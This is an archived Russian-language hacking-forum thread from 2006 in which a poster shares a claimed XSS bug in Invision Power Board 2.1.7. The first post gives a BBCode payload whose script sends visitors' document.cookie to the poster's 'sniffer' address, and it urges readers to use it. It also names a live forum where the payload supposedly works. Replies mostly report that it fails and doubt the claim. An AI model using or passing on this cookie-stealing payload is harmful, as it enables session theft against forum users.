HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Ура! Я вродь нашёл баг в Ipb 2.1.7
  #1  
Старый 06.10.2006, 18:32
~Real F@ck!~
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
С нами: 10441826

Репутация: 354
Talking Ура! Я вродь нашёл баг в Ipb 2.1.7

Короче роюсь я роюсь в своём форуме и нашёл баг-
Код:
[warn][img]j a v a s c r i p t:alert(/<script>img = new Image(); img.src = "адресс твоего сниффера?"+document.cookie;</script>/).jpg[/img][/warn]
Если у кого он сработает и если я кому помог тогда жду +++ ! =)

И кстати писать это надо прямиком в сообщение... Это пассивная Xss бага! Юзаем парни.... удачи!

==================

Цитата:
Сообщение от Модератора  
Учимся соединять свой посты или продолжаем получать минусы !
==================

Последний раз редактировалось Nova; 08.10.2006 в 11:48.. Причина: В посте написана =)
 
Ответить с цитированием

  #2  
Старый 06.10.2006, 20:10
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами: 10350730

Репутация: 337
По умолчанию

"Динамические страницы в тэгах [img] запрещены"

Боюсь такой же ответ ждет на большинстве форумов.
 
Ответить с цитированием

  #3  
Старый 06.10.2006, 20:14
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
С нами: 10695206

Репутация: 245
По умолчанию

угу
 
Ответить с цитированием

  #4  
Старый 07.10.2006, 05:42
Twiddle
Познающий
Регистрация: 06.09.2006
Сообщений: 94
С нами: 10356548

Репутация: 15
По умолчанию

Неа, не катит... А жаль.. =(
 
Ответить с цитированием

  #5  
Старый 07.10.2006, 08:16
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

покажи конкретный 2.1.7 где ты это нашел. т.к. это бред..
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #6  
Старый 07.10.2006, 11:53
~Real F@ck!~
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
С нами: 10441826

Репутация: 354
По умолчанию

blackybr forum.angelz.ru ток чур неломать а то мне капут!
 
Ответить с цитированием

  #7  
Старый 07.10.2006, 12:11
WEB'er
Новичок
Регистрация: 26.06.2006
Сообщений: 21
С нами: 10460154

Репутация: 5
По умолчанию

Эта бага зависит от настроек форума, я так думаю. И очень мало форумов удасться сломать
 
Ответить с цитированием

  #8  
Старый 07.10.2006, 13:01
Bayazid
Участник форума
Регистрация: 26.11.2005
Сообщений: 193
С нами: 10765622

Репутация: 40
По умолчанию

У меня не сработала...(
 
Ответить с цитированием

  #9  
Старый 07.10.2006, 13:08
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами: 10555586

Репутация: 726


По умолчанию

Наврядли у кого будет это работать. Почти ва всех форумах [img] запрещены. Я например попробывал на 5 форумах и ничего. А так поиск уязвимостей это благое дело!
За старание можно поставить +)
 
Ответить с цитированием

  #10  
Старый 07.10.2006, 15:29
-Concord-
Постоянный
Регистрация: 16.06.2006
Сообщений: 334
С нами: 10474288

Репутация: 600
По умолчанию

Всё просто, но не везде идёт. я этим давно пользовался.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла на Ipb 2.1.7 Thrasher Уязвимости CMS / форумов 15 14.01.2007 14:51
куда заливаются файлы? Ipb 2.1.7 Aztec Уязвимости CMS / форумов 9 06.11.2006 13:29
Xss в Ipb 2.1.7 Fr-Ron Уязвимости CMS / форумов 4 15.09.2006 22:07
Может кто нибудь определить префикс в Ipb 2.1.7 samurays Уязвимости CMS / форумов 8 06.09.2006 19:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.